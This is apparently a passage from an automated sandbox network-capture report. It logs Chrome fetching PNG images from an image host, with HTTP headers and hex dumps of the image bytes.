                                            2024-12-03 08:56:59 UTC3717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 06 00 00 00 cb d6 df 8a 00 00 20 00 49 44 41 54 78 5e ec 7d 07 80 24 55 b5 f6 e9 ea ae 8e 13 77 77 76 97 5d c2 c2 92 e3 22 2c 51 d0 47 f0 81 18 31 21 62 fc 0d 4f f2 53 14 41 44 45 54 9e 59 44 c1 f0 14 44 04 11 09 82 82 3e 8c 60 40 10 24 07 09 cb e6 30 79 a6 73 75 df ff 3b f7 56 75 f7 cc ce b2 b3 d3 a9 ba e7 94 0e b3 d3 5d 5d 75 eb bb a7 ef 77 4f 0e 90 1c 82 80 20 20 08 08 02 82 80 20 d0 f2 08 04 5a fe 09 e4 01 04 01 41 40 10 10 04 04 01 41 80 84 d0 45 08 04 01 41 40 10 10 04 04 81 36 40 40 08 bd 0d 26 51 1e 41 10 10 04 04 01 41 40 10 10 42 17 19 10 04 04 01 41 40 10 10 04 da 00 01 21 f4 36 98 44 79 04 41 40 10 10 04 04 01 41 40 08 5d 64 40 10 10 04 04 01 41 40 10 68 03 04 84 d0 db
                                            Data Ascii: PNGIHDR IDATx^}$Uwwv]",QG1!bOSADETYDD>`@$0ysu;Vu]]uwO ZA@AEA@6@@&QAA@BA@!6DyA@A@]d@A@h
                                            2024-12-03 08:56:59 UTC4096INData Raw: f4 ed 2a e4 e6 37 17 6e e1 6b 71 5e b8 d6 cc f9 a8 30 b9 17 0a f9 d6 02 d5 67 a3 15 42 f7 d9 84 c8 70 04 81 2a 10 10 42 af 02 bc 76 f9 e8 99 d7 ff 45 ad 5c b5 8e 36 6c 1a a4 64 06 a6 71 10 b8 83 b6 1c 9c bf 6d 45 12 3a 87 3b 0b 22 e7 80 34 2b 68 23 cf db 34 1a d1 c1 69 9c 49 ed 56 15 63 e2 f5 b4 6b ce c1 e6 d4 6c 85 60 37 dd 15 8c 4b 8b 32 81 43 3b d7 c1 6c da c4 ce e4 6e 2a 9c 29 68 f9 de e7 bd 42 2d 4c fc ac a1 b3 b9 bd 74 0f 37 7f 9c ab ac 71 36 77 08 da bf 97 6a d5 2e f3 d1 c8 e7 10 42 6f 24 da 72 2f 41 a0 be 08 08 a1 d7 17 5f 5f 5e fd e8 0f 7d 4a 8d 58 bd 94 0c 75 50 96 d3 c0 28 5c 91 ab 3d b1 17 37 07 aa e9 0e 62 15 45 4c f8 a1 4c f1 13 dd 3f ac a2 63 d7 c4 dc 68 9d 9f ad 79 bb 5c f1 4c 97 28 c5 51 69 32 37 f9 e1 9b fb cf 2b 5f e3 33 4c 3d f3 0a 91
                                            Data Ascii: *7nkq^0gBp*BvE\6ldqmE:;"4+h#4iIVckl`7K2C;ln*)hB-Lt7q6wj.Bo$r/A__^}JXuP(\=7bELL?chy\L(Qi27+_3L=
                                            2024-12-03 08:56:59 UTC4096INData Raw: ef a3 8d 2b 5f 20 4a 0d d0 b2 9d e7 d1 bd 97 be 55 d6 cc ea 44 4e 3e 5d 47 04 44 38 eb 08 ae 5f 2f dd 56 84 ee 2e d6 3a 4d a9 e8 9a bb 99 5e dd e8 66 2f f8 a9 9c 7e 56 61 30 d7 66 5a 73 ae 97 ee e4 cd d9 64 f2 2f 79 de 35 f9 9b 20 3a 93 02 e7 11 3a 2b e7 53 99 f5 3d 53 be f9 aa 99 ff 9a d2 a4 7c 98 f4 ba e6 1d ad 4d e8 c6 94 6e c8 7a 62 dc 84 17 28 c7 f3 68 b2 11 3c a2 37 bf 83 45 74 62 63 0b 0d c8 3b ef 64 91 4e 57 20 db 86 f9 1e 95 e6 0a 85 02 ae 09 92 0f d9 94 1c 4d 52 57 22 46 1d c1 22 65 06 56 52 6f 60 94 5e 7f cc 72 fa f2 29 87 cb da d9 3c b1 95 3b 6f 01 01 11 ca 59 28 1a ed 42 e8 3c 75 79 04 31 85 c3 61 2a e4 1d 9d 06 c5 26 53 3e 1c 57 d3 72 8a 05 28 e0 ac c7 19 5f ab c2 ea ae 23 d5 59 a3 47 44 74 9e 6b 7e 63 65 b7 50 90 84 ff e6 1f 5e dc a9 80 c0
                                            Data Ascii: +_ JUDN>]GD8_/V.:M^f/~Va0fZsd/y5 ::+S=S|Mnzb(h<7Etbc;dNW MRW"F"eVRo`^r)<;oY(B<uy1a*&S>Wr(_#YGDtk~ceP^
                                            2024-12-03 08:56:59 UTC4096INData Raw: 49 ab 38 40 cf d6 30 88 e8 ed df fc b5 7a e4 f9 8d 34 94 43 24 32 7c 9b 59 dc cb 4e f4 6a 0d 2b a0 98 d0 39 ca 1e b5 c3 39 91 8e 9b 72 60 1c 09 0c 2e 9f 1a a5 50 3e 45 4b 17 f7 d2 b1 87 1c 40 17 9e b4 df 94 df 9b a5 67 5d a1 86 ac 79 94 e7 5a ee 05 53 59 cc 0b 94 9a 5c 58 46 4c ee 8d 90 f4 fa dd 63 8f b3 7e a8 c6 02 1d 94 b5 12 3a 48 ce 3b d8 6f ee 15 32 d6 ee 0c b4 f6 8d 27 3a 61 9e c7 66 11 b2 d4 81 53 c7 d6 21 8d 6d f7 05 74 f7 27 25 8d ad 7e 33 34 3b af 2c 84 3e 0b e7 dd 5f 84 0e 6d 1c 05 39 42 9c 05 04 a7 7a 1e 55 b9 2c 74 d3 ea 08 a4 a9 8f fa e9 d1 af bd bf 26 32 fa aa 4b 7f a1 1e 5b 35 48 63 c5 18 45 bb e7 c1 04 1a 86 6f 33 0d c2 35 45 40 38 ca de 3b f8 35 14 e9 d6 3e 70 27 87 0e 5a ba a9 26 aa 84 c1 a7 1f 51 29 5a dc 1b a5 57 1e ba 8c 3e f7 9a 89
                                            Data Ascii: I8@0z4C$2|YNj+99r`.P>EK@g]yZSY\XFLc~:H;o2':afS!mt'%~34;,>_m9BzU,t&2K[5HcEo35E@8;5>p'Z&Q)ZW>
                                            2024-12-03 08:56:59 UTC4096INData Raw: b9 e8 51 98 dd 0f dc b1 8b ee 3c ff 8d 0d 95 d5 e3 bf 78 a3 7a e2 f9 f5 e4 d8 5d b0 a9 f6 e0 77 9c 32 50 c6 38 f0 9d 35 75 6c 3b 28 95 4a 61 51 37 b5 b9 f5 51 ea 73 ce 04 6d 0a 86 98 88 e4 89 84 ce 7f b3 8f d5 98 4d 9b 47 e6 66 5c 52 58 66 ba 5f c5 57 23 ef fc af cf 8e 90 d5 bb 18 96 19 b8 62 d8 de 82 a8 f6 66 1d 3a bd 92 cd f7 2c 63 ba 92 2c 64 29 e8 50 38 3f 46 8b ed 0c 3d fa f5 da 07 94 36 eb 59 e5 be d3 43 a0 a1 8b e4 f4 86 24 67 d5 1b 01 df 11 ba 6b ae e6 fc 5b ce b5 f5 88 d0 42 fa 5a 24 3f 42 dd 30 bd 3f f7 ed fa 9b dd 27 e3 7e c1 ad 0f aa bb fe fc 20 6d 48 2a ca a0 e9 46 10 9d b4 b8 4e 77 32 83 f6 1b d0 d2 a3 51 93 3b 5f 79 54 fa ca cd 73 b8 69 6f 15 1a 3a 9f 8f 3a 62 a5 5c e2 7a cf f7 4b 5d 5f 08 7d fa e8 2f 3f ef 47 ea a9 21 94 06 66 42 07 89 e6
                                            Data Ascii: Q<xz]w2P85ul;(JaQ7QsmMGf\RXf_W#bf:,c,d)P8?F=6YC$gk[BZ$?B0?'~ mH*FNw2Q;_yTsio::b\zK]_}/?G!fB
                                            2024-12-03 08:56:59 UTC4096INData Raw: 39 45 6e ba 49 a3 2c 13 3a 0f 85 4d ea 4c f4 1c 40 a7 ff 76 9b bc f0 c6 b5 c0 9b 00 96 7b c8 7a 2a 8d 3a 0a 5d 5d 14 8f c6 90 81 39 4a c9 81 35 94 40 c1 a4 e5 7b 2e a1 3b cf 3f a9 6a 39 ad 33 2c 72 f9 06 23 20 02 d1 60 c0 fd 70 3b 3f 11 ba 05 03 a2 36 87 63 81 63 d3 b8 03 53 22 97 7a 0d a3 50 46 e5 c1 55 b7 78 b1 73 72 46 7b 0f b2 b6 c3 81 43 20 f4 f2 51 51 22 73 0b a4 5e 4a 07 62 8a c5 35 1c 44 26 c7 a0 a5 87 0b 29 72 06 56 d0 e1 4b e7 d2 9d 9f aa be 06 f6 ee 67 ff 50 0d 5a bd e8 91 8e 56 af da ff e9 8d cd 25 74 8e 7e ae 48 c1 6b 96 5c 88 0f bd 36 c8 2f bf e0 06 f5 62 0a c6 f0 70 17 65 b1 c3 2c fb c5 8d 2f dc 04 3f ba e6 73 c8 9d e9 26 08 7b 3c 48 9b e5 9d 8b d2 30 89 eb ea fe 90 0b 6d 8d e2 94 47 fc 5d 80 45 2a 97 1a a2 48 3e 49 3b f4 84 e9 d0 bd 96 d0
                                            Data Ascii: 9EnI,:ML@v{z*:]]9J5@{.;?j93,r# `p;?6ccS"zPFUxsrF{C QQ"s^Jb5D&)rVKgPZV%t~Hk\6/bpe,/?s&{<H0mG]E*H>I;
                                            2024-12-03 08:56:59 UTC4096INData Raw: 20 7b 8d d0 d0 97 9d fe 75 35 18 9a 07 f3 7a 07 34 5a 34 2b 41 c7 39 c5 d1 e1 dc 5e d4 ed 55 5f 09 85 87 95 f7 9a 76 51 70 ef 78 8e 1e 77 71 e5 7f 87 14 b4 e6 dc 08 cd 09 2b 3a 64 ef 9d e9 ea 0f 1e bd 4d eb d9 f2 8f 5f ad 36 a4 51 22 18 f3 57 d0 9b 2e 24 a3 61 3c fc 6f 76 89 e8 46 2b 88 5a 67 8b 01 b6 17 3a 8a 9d 6f 60 86 5c d4 4d 57 82 e8 1d 90 1a 1f a1 6e f8 05 c2 d0 cc ed d4 26 3a e9 f0 03 e8 aa f7 48 35 38 1f 88 f7 ac 1b c2 36 7d 01 66 1d 3a 6d fa c0 7e 22 74 2e bc a2 cd 99 20 74 4e f9 09 c2 17 69 15 d2 d4 41 49 3a 70 e7 3e fa d5 d9 b5 69 98 52 cb a9 3c f9 f2 bb d4 bf 9e 5f 4f 1b 91 9f 1c ea 98 af cd b3 ad 7a 34 82 d0 f7 3a f3 4a 35 18 5c 40 a9 60 87 a9 ab cf a4 e8 f6 ad 9f 8a d0 a7 8b 25 8f 3d 8a c0 b9 dc d8 00 25 10 51 7e f0 ae 8b e8 97 1f 3b 71 ab
                                            Data Ascii: {u5z4Z4+A9^U_vQpxwq+:dM_6Q"W.$a<ovF+Zg:o`\MWn&:H586}f:m~"t. tNiAI:p>iR<_Oz4:J5\@`%=%Q~;q
                                            2024-12-03 08:56:59 UTC4096INData Raw: 9a 43 f3 ef bb 50 de 69 32 c1 b3 96 80 4c fe 2c 1c 7a 71 b9 67 e1 a0 77 a0 cb fd e8 ab 1f 52 df d5 29 b2 76 ef 47 01 53 0e 79 a0 e9 61 58 dd d0 65 88 32 2a bb 35 5b dc 7b 5c 62 34 7c bd f9 9b 9a 85 0e eb 9d 0d 78 0e a8 33 a1 76 bb 59 17 a2 fa 9d 9b a9 d4 a1 a3 23 fb 14 d3 9c eb cf 96 f7 99 4c ed ac 26 20 0f 40 16 0e bf 08 7a 16 0e 7a 07 0a fa d8 a7 df 53 0b d7 ef a4 8d 35 6e 72 93 85 c2 56 58 eb 26 2b f9 03 c8 17 37 9a 7f b0 c0 61 ba 47 9d ef 10 f9 c8 7f 07 83 7e 32 62 cf dd 00 d5 d7 87 43 a4 02 3e d2 b1 9b 1d 6f 2e 8b c1 4f e5 76 45 27 1c 79 28 4d 3c ef 68 79 97 c9 b4 ce 7a 02 f2 10 64 e1 14 10 41 cf c2 41 ef 40 41 8f 7e f4 c5 8f cf 53 ab 36 6c a5 2a a7 8f 94 d9 46 3a 8b 83 9a 82 d8 27 47 95 37 fe e2 f4 33 ee 97 c6 c6 b9 8e 1b 9c e3 cb 6c 82 98 c3 b5 ae
                                            Data Ascii: CPi2L,zqgwR)vGSyaXe2*5[{\b4|x3vY#L& @zzS5nrVX&+7aG~2bC>o.OvE'y(M<hyzdAA@A~S6l*F:'G73l
                                            2024-12-03 08:56:59 UTC4096INData Raw: c9 a7 f5 a2 6f 70 f9 d1 9e 16 bb e4 70 b1 b3 a5 ee 83 a5 0e ad d7 02 f0 42 dc 83 1e ae 7c 1d 84 9b dd ed 41 ee 52 87 a8 39 ab 29 e2 8a 0f 63 6f df ec ad a2 11 dd f4 34 f7 56 b1 d0 bb e8 74 91 db ea e4 04 44 d0 3b f9 00 ca e5 0b 81 f6 10 18 f5 cc ff d4 ce 7a 37 7d bb a5 06 96 bc 19 51 f6 1c 2f 1f 69 5e c3 fb f0 3e 0e c2 c3 7a df eb 6a 24 8b d5 ae e5 d0 e7 e9 fc 74 74 4f 33 bd 38 f6 1c 79 6f b4 07 ba 1c 23 04 52 4c 40 1e cc 14 03 96 d3 0b 81 ce 44 80 a3 ee 37 23 e2 5e 4b af 6b 6c a2 9c 9c 1c f2 23 93 ad 1e 75 70 ad ca 4b c3 7b db e9 c5 5b 2e 95 f7 46 67 1a 54 b9 d6 ac 21 20 0f 66 d6 0c b5 dc a8 10 68 3f 81 cb 9f 78 5f 79 1a 6a a8 cc e8 a6 87 46 5f 26 ef 8d f6 a3 94 23 85 40 ca 08 c8 83 99 32 b4 72 62 21 20 04 84 80 10 10 02 e9 23 20 82 9e 3e d6 f2 49 42 40
                                            Data Ascii: oppB|AR9)co4VtD;z7}Q/i^>zj$ttO38yo#RL@D7#^Kkl#upK{[.FgT! fh?x_yjF_&#@2rb! # >IB@
                                            2024-12-03 08:56:59 UTC4096INData Raw: 1b 50 64 0f 39 de 4d 28 36 55 4b 9f 3e f9 af 1f 9d e3 9a 59 9f ab af d6 6e a2 1a a7 9b ac 08 2a f4 a0 fc ae 07 75 02 bc b8 4f 2e 0a 6d c1 73 90 63 d1 53 8e 21 48 fd fb 94 d1 cc 6b e3 af c4 f7 ab d1 93 54 95 4f 8f fa fd 16 54 8f 34 91 cd 91 47 b5 4d 3e 72 06 e0 6a e7 06 4e 60 68 43 39 5f 67 d5 36 cc b7 62 94 f3 75 a1 fb 23 0a 03 a3 12 20 17 a7 e6 b2 ff 56 f2 22 7b c1 4d ef 4c 94 12 d2 e9 d2 a2 b8 26 5c ba 2e aa 2b 7f 4e ff 6b 66 a8 3a 95 47 e6 fc 32 6a 6a a8 45 da 9a 8b 7e ff b3 a1 74 ff 1f 3a b6 d5 e4 21 57 3f a5 7c d6 52 b8 d2 f4 a4 47 3d f8 52 a4 ad 2d 69 25 e8 bf be e5 59 b5 a3 01 2d 5d ad f9 b0 0c 15 d5 bb bd 64 b1 a2 da 1d 5e c6 36 9b 0d 2f 4f b4 75 85 b0 06 21 ee 8d 0d 0d e8 e3 e1 a6 f2 1c 33 1d d6 b3 90 5e b8 2e b1 52 98 e7 3f fa 8e 5a b7 65 17 6d
                                            Data Ascii: Pd9M(6UK>Yn*uO.mscS!HkTOT4GM>rjN`hC9_g6bu# V"{ML&\.+Nkf:G2jjE~t:!W?|RG=R-i%Y-]d^6/Ou!3^.R?Zem


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.44974491.134.9.1604433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:56:58 UTC574OUTGET /42sVSPG/b.png HTTP/1.1
                                            Host: i.ibb.co
                                            Connection: keep-alive
                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                            sec-ch-ua-mobile: ?0
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            sec-ch-ua-platform: "Windows"
                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                            Sec-Fetch-Site: cross-site
                                            Sec-Fetch-Mode: no-cors
                                            Sec-Fetch-Dest: image
                                            Referer: https://dsiete.co/
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:56:59 UTC378INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 03 Dec 2024 08:56:59 GMT
                                            Content-Type: image/png
                                            Content-Length: 3524
                                            Connection: close
                                            Last-Modified: Thu, 26 Oct 2023 23:17:53 GMT
                                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                            Cache-Control: max-age=315360000
                                            Cache-Control: public
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, OPTIONS
                                            Accept-Ranges: bytes
                                            2024-12-03 08:56:59 UTC3524INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 68 00 00 01 68 04 03 00 00 00 88 cb 7c e6 00 00 00 12 50 4c 54 45 26 7c b5 ee ee ef ff ff ff 10 6f ae 5e 9e c8 9c c3 dc 36 1d 7c 59 00 00 0d 6d 49 44 41 54 78 da d5 dd c9 76 eb aa 12 00 50 12 e2 b9 45 ec f9 81 65 cf c9 95 34 4f dc cc 63 cb f9 ff 5f b9 ea dd c9 54 81 00 95 34 79 cf 37 59 c9 3e 95 a2 28 50 c7 54 73 c8 a4 39 46 7f 94 c9 fa ef 70 f8 66 f5 71 38 1c ff fe 92 44 54 df e2 f1 17 31 7f 3f ab fc 7f eb cb 81 a5 69 ca 79 63 66 5c 97 9f 52 76 38 9e 84 22 88 56 2a 59 5f 2a 30 1b 38 6a 78 eb a6 83 16 72 7d f9 4e 53 cd 5e 1e bc fc ea f1 44 08 ad e4 fa 9b 0f c7 f8 3e e0 fa a3 64 13 41 af bf 11 e2 36 de 1f 7f 42 12 40 97 64 cd d0 47 1d 6d 39 31 5a 5e b0 51 be 46 7b 91 a8 49 d1 2b 6e 49 6e 0a e1 51 c8
                                            Data Ascii: PNGIHDRhh|PLTE&|o^6|YmIDATxvPEe4Oc_T4y7Y>(PTs9Fpfq8DT1?iycf\Rv8"V*Y_*08jxr}NS^D>dA6B@dGm91Z^QF{I+nInQ


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.44974591.134.10.1684433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:00 UTC345OUTGET /42sVSPG/b.png HTTP/1.1
                                            Host: i.ibb.co
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:01 UTC378INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 03 Dec 2024 08:57:01 GMT
                                            Content-Type: image/png
                                            Content-Length: 3524
                                            Connection: close
                                            Last-Modified: Thu, 26 Oct 2023 23:17:53 GMT
                                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                            Cache-Control: max-age=315360000
                                            Cache-Control: public
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, OPTIONS
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:01 UTC3524INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 68 00 00 01 68 04 03 00 00 00 88 cb 7c e6 00 00 00 12 50 4c 54 45 26 7c b5 ee ee ef ff ff ff 10 6f ae 5e 9e c8 9c c3 dc 36 1d 7c 59 00 00 0d 6d 49 44 41 54 78 da d5 dd c9 76 eb aa 12 00 50 12 e2 b9 45 ec f9 81 65 cf c9 95 34 4f dc cc 63 cb f9 ff 5f b9 ea dd c9 54 81 00 95 34 79 cf 37 59 c9 3e 95 a2 28 50 c7 54 73 c8 a4 39 46 7f 94 c9 fa ef 70 f8 66 f5 71 38 1c ff fe 92 44 54 df e2 f1 17 31 7f 3f ab fc 7f eb cb 81 a5 69 ca 79 63 66 5c 97 9f 52 76 38 9e 84 22 88 56 2a 59 5f 2a 30 1b 38 6a 78 eb a6 83 16 72 7d f9 4e 53 cd 5e 1e bc fc ea f1 44 08 ad e4 fa 9b 0f c7 f8 3e e0 fa a3 64 13 41 af bf 11 e2 36 de 1f 7f 42 12 40 97 64 cd d0 47 1d 6d 39 31 5a 5e b0 51 be 46 7b 91 a8 49 d1 2b 6e 49 6e 0a e1 51 c8
                                            Data Ascii: PNGIHDRhh|PLTE&|o^6|YmIDATxvPEe4Oc_T4y7Y>(PTs9Fpfq8DT1?iycf\Rv8"V*Y_*08jxr}NS^D>dA6B@dGm91Z^QF{I+nInQ


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.44974691.134.10.1684433264C:\Program Files\Google\Chrome\Application\chrome.exe
                                            TimestampBytes transferredDirectionData
                                            2024-12-03 08:57:01 UTC365OUTGET /zr2zMVC/output-onlinepngtools.png HTTP/1.1
                                            Host: i.ibb.co
                                            Connection: keep-alive
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                            Accept: */*
                                            Sec-Fetch-Site: none
                                            Sec-Fetch-Mode: cors
                                            Sec-Fetch-Dest: empty
                                            Accept-Encoding: gzip, deflate, br
                                            Accept-Language: en-US,en;q=0.9
                                            2024-12-03 08:57:01 UTC379INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Tue, 03 Dec 2024 08:57:01 GMT
                                            Content-Type: image/png
                                            Content-Length: 51741
                                            Connection: close
                                            Last-Modified: Thu, 25 Apr 2024 00:27:21 GMT
                                            Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                            Cache-Control: max-age=315360000
                                            Cache-Control: public
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, OPTIONS
                                            Accept-Ranges: bytes
                                            2024-12-03 08:57:01 UTC3717INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 06 00 00 00 cb d6 df 8a 00 00 20 00 49 44 41 54 78 5e ec 7d 07 80 24 55 b5 f6 e9 ea ae 8e 13 77 77 76 97 5d c2 c2 92 e3 22 2c 51 d0 47 f0 81 18 31 21 62 fc 0d 4f f2 53 14 41 44 45 54 9e 59 44 c1 f0 14 44 04 11 09 82 82 3e 8c 60 40 10 24 07 09 cb e6 30 79 a6 73 75 df ff 3b f7 56 75 f7 cc ce b2 b3 d3 a9 ba e7 94 0e b3 d3 5d 5d 75 eb bb a7 ef 77 4f 0e 90 1c 82 80 20 20 08 08 02 82 80 20 d0 f2 08 04 5a fe 09 e4 01 04 01 41 40 10 10 04 04 01 41 80 84 d0 45 08 04 01 41 40 10 10 04 04 81 36 40 40 08 bd 0d 26 51 1e 41 10 10 04 04 01 41 40 10 10 42 17 19 10 04 04 01 41 40 10 10 04 da 00 01 21 f4 36 98 44 79 04 41 40 10 10 04 04 01 41 40 08 5d 64 40 10 10 04 04 01 41 40 10 68 03 04 84 d0 db
                                            Data Ascii: PNGIHDR IDATx^}$Uwwv]",QG1!bOSADETYDD>`@$0ysu;Vu]]uwO ZA@AEA@6@@&QAA@BA@!6DyA@A@]d@A@h
                                            2024-12-03 08:57:01 UTC4096INData Raw: f4 ed 2a e4 e6 37 17 6e e1 6b 71 5e b8 d6 cc f9 a8 30 b9 17 0a f9 d6 02 d5 67 a3 15 42 f7 d9 84 c8 70 04 81 2a 10 10 42 af 02 bc 76 f9 e8 99 d7 ff 45 ad 5c b5 8e 36 6c 1a a4 64 06 a6 71 10 b8 83 b6 1c 9c bf 6d 45 12 3a 87 3b 0b 22 e7 80 34 2b 68 23 cf db 34 1a d1 c1 69 9c 49 ed 56 15 63 e2 f5 b4 6b ce c1 e6 d4 6c 85 60 37 dd 15 8c 4b 8b 32 81 43 3b d7 c1 6c da c4 ce e4 6e 2a 9c 29 68 f9 de e7 bd 42 2d 4c fc ac a1 b3 b9 bd 74 0f 37 7f 9c ab ac 71 36 77 08 da bf 97 6a d5 2e f3 d1 c8 e7 10 42 6f 24 da 72 2f 41 a0 be 08 08 a1 d7 17 5f 5f 5e fd e8 0f 7d 4a 8d 58 bd 94 0c 75 50 96 d3 c0 28 5c 91 ab 3d b1 17 37 07 aa e9 0e 62 15 45 4c f8 a1 4c f1 13 dd 3f ac a2 63 d7 c4 dc 68 9d 9f ad 79 bb 5c f1 4c 97 28 c5 51 69 32 37 f9 e1 9b fb cf 2b 5f e3 33 4c 3d f3 0a 91
                                            Data Ascii: *7nkq^0gBp*BvE\6ldqmE:;"4+h#4iIVckl`7K2C;ln*)hB-Lt7q6wj.Bo$r/A__^}JXuP(\=7bELL?chy\L(Qi27+_3L=
                                            2024-12-03 08:57:01 UTC4096INData Raw: ef a3 8d 2b 5f 20 4a 0d d0 b2 9d e7 d1 bd 97 be 55 d6 cc ea 44 4e 3e 5d 47 04 44 38 eb 08 ae 5f 2f dd 56 84 ee 2e d6 3a 4d a9 e8 9a bb 99 5e dd e8 66 2f f8 a9 9c 7e 56 61 30 d7 66 5a 73 ae 97 ee e4 cd d9 64 f2 2f 79 de 35 f9 9b 20 3a 93 02 e7 11 3a 2b e7 53 99 f5 3d 53 be f9 aa 99 ff 9a d2 a4 7c 98 f4 ba e6 1d ad 4d e8 c6 94 6e c8 7a 62 dc 84 17 28 c7 f3 68 b2 11 3c a2 37 bf 83 45 74 62 63 0b 0d c8 3b ef 64 91 4e 57 20 db 86 f9 1e 95 e6 0a 85 02 ae 09 92 0f d9 94 1c 4d 52 57 22 46 1d c1 22 65 06 56 52 6f 60 94 5e 7f cc 72 fa f2 29 87 cb da d9 3c b1 95 3b 6f 01 01 11 ca 59 28 1a ed 42 e8 3c 75 79 04 31 85 c3 61 2a e4 1d 9d 06 c5 26 53 3e 1c 57 d3 72 8a 05 28 e0 ac c7 19 5f ab c2 ea ae 23 d5 59 a3 47 44 74 9e 6b 7e 63 65 b7 50 90 84 ff e6 1f 5e dc a9 80 c0
                                            Data Ascii: +_ JUDN>]GD8_/V.:M^f/~Va0fZsd/y5 ::+S=S|Mnzb(h<7Etbc;dNW MRW"F"eVRo`^r)<;oY(B<uy1a*&S>Wr(_#YGDtk~ceP^
                                            2024-12-03 08:57:01 UTC4096INData Raw: 49 ab 38 40 cf d6 30 88 e8 ed df fc b5 7a e4 f9 8d 34 94 43 24 32 7c 9b 59 dc cb 4e f4 6a 0d 2b a0 98 d0 39 ca 1e b5 c3 39 91 8e 9b 72 60 1c 09 0c 2e 9f 1a a5 50 3e 45 4b 17 f7 d2 b1 87 1c 40 17 9e b4 df 94 df 9b a5 67 5d a1 86 ac 79 94 e7 5a ee 05 53 59 cc 0b 94 9a 5c 58 46 4c ee 8d 90 f4 fa dd 63 8f b3 7e a8 c6 02 1d 94 b5 12 3a 48 ce 3b d8 6f ee 15 32 d6 ee 0c b4 f6 8d 27 3a 61 9e c7 66 11 b2 d4 81 53 c7 d6 21 8d 6d f7 05 74 f7 27 25 8d ad 7e 33 34 3b af 2c 84 3e 0b e7 dd 5f 84 0e 6d 1c 05 39 42 9c 05 04 a7 7a 1e 55 b9 2c 74 d3 ea 08 a4 a9 8f fa e9 d1 af bd bf 26 32 fa aa 4b 7f a1 1e 5b 35 48 63 c5 18 45 bb e7 c1 04 1a 86 6f 33 0d c2 35 45 40 38 ca de 3b f8 35 14 e9 d6 3e 70 27 87 0e 5a ba a9 26 aa 84 c1 a7 1f 51 29 5a dc 1b a5 57 1e ba 8c 3e f7 9a 89
                                            Data Ascii: I8@0z4C$2|YNj+99r`.P>EK@g]yZSY\XFLc~:H;o2':afS!mt'%~34;,>_m9BzU,t&2K[5HcEo35E@8;5>p'Z&Q)ZW>
                                            2024-12-03 08:57:01 UTC4096INData Raw: b9 e8 51 98 dd 0f dc b1 8b ee 3c ff 8d 0d 95 d5 e3 bf 78 a3 7a e2 f9 f5 e4 d8 5d b0 a9 f6 e0 77 9c 32 50 c6 38 f0 9d 35 75 6c 3b 28 95 4a 61 51 37 b5 b9 f5 51 ea 73 ce 04 6d 0a 86 98 88 e4 89 84 ce 7f b3 8f d5 98 4d 9b 47 e6 66 5c 52 58 66 ba 5f c5 57 23 ef fc af cf 8e 90 d5 bb 18 96 19 b8 62 d8 de 82 a8 f6 66 1d 3a bd 92 cd f7 2c 63 ba 92 2c 64 29 e8 50 38 3f 46 8b ed 0c 3d fa f5 da 07 94 36 eb 59 e5 be d3 43 a0 a1 8b e4 f4 86 24 67 d5 1b 01 df 11 ba 6b ae e6 fc 5b ce b5 f5 88 d0 42 fa 5a 24 3f 42 dd 30 bd 3f f7 ed fa 9b dd 27 e3 7e c1 ad 0f aa bb fe fc 20 6d 48 2a ca a0 e9 46 10 9d b4 b8 4e 77 32 83 f6 1b d0 d2 a3 51 93 3b 5f 79 54 fa ca cd 73 b8 69 6f 15 1a 3a 9f 8f 3a 62 a5 5c e2 7a cf f7 4b 5d 5f 08 7d fa e8 2f 3f ef 47 ea a9 21 94 06 66 42 07 89 e6
                                            Data Ascii: Q<xz]w2P85ul;(JaQ7QsmMGf\RXf_W#bf:,c,d)P8?F=6YC$gk[BZ$?B0?'~ mH*FNw2Q;_yTsio::b\zK]_}/?G!fB
